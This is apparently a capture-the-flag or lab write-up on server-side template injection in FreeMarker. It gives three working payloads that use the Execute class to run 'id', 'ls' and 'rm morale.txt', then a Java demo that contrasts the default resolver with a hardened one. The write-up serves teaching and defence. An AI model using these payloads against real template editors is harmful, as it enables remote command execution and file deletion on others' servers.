First, we "View details" of a product and click "Edit template". We can see that the template gets its data using ${product.name}. Changing it to ${a} and clicking "Preview" raises an exception that reveals the template engine, which is FreeMarker.
According to @albinowax in Server-Side Template Injection, to execute the 'id' command, we inject:
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("id") }
Then, we execute 'ls' and there is a file named 'morale.txt'.
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("ls") }
Remove the file with:
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("rm morale.txt") }
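All three payloads depend on FreeMarker's ?new built-in being allowed to instantiate freemarker.template.utility.Execute. The following is an added example, not part of the original write-up or the lab's code: it renders the same 'id' payload under the default configuration and under a hardened one. It assumes FreeMarker 2.3.x on the classpath; the class name, template name and data model are hypothetical.

```java
import freemarker.core.TemplateClassResolver;
import freemarker.template.Configuration;
import freemarker.template.Template;
import freemarker.template.TemplateException;

import java.io.IOException;
import java.io.StringWriter;
import java.util.Map;

// Hypothetical demo class; only the FreeMarker calls are real library API.
public class NewBuiltinResolverDemo {

    // Same payload shape as in the write-up, using the harmless 'id' command.
    static final String EDITED_TEMPLATE =
        "<#assign ex=\"freemarker.template.utility.Execute\"?new()> ${ ex(\"id\") }";

    // Renders the user-edited template source and reports what happened.
    static String preview(Configuration cfg) {
        try {
            Template t = new Template("product-description", EDITED_TEMPLATE, cfg);
            StringWriter out = new StringWriter();
            t.process(Map.of("product", Map.of("name", "demo")), out);
            return "rendered -> " + out.toString().trim();
        } catch (TemplateException | IOException e) {
            // With a restrictive resolver, ?new fails here before Execute exists.
            return "rejected -> " + e.getClass().getSimpleName();
        }
    }

    public static void main(String[] args) {
        // Weak: the default resolver is UNRESTRICTED_RESOLVER, so ?new can
        // instantiate any TemplateModel class, including utility.Execute.
        Configuration weak = new Configuration(Configuration.VERSION_2_3_30);

        // Hardened: ?new may not instantiate anything. SAFER_RESOLVER is the
        // milder option; it blocks Execute, ObjectConstructor and JythonRuntime.
        Configuration hardened = new Configuration(Configuration.VERSION_2_3_30);
        hardened.setNewBuiltinClassResolver(
            TemplateClassResolver.ALLOWS_NOTHING_RESOLVER);

        System.out.println("default resolver : " + preview(weak));
        System.out.println("allows nothing   : " + preview(hardened));
    }
}
```

The resolver only closes the ?new route; letting untrusted users edit template source remains the underlying risk.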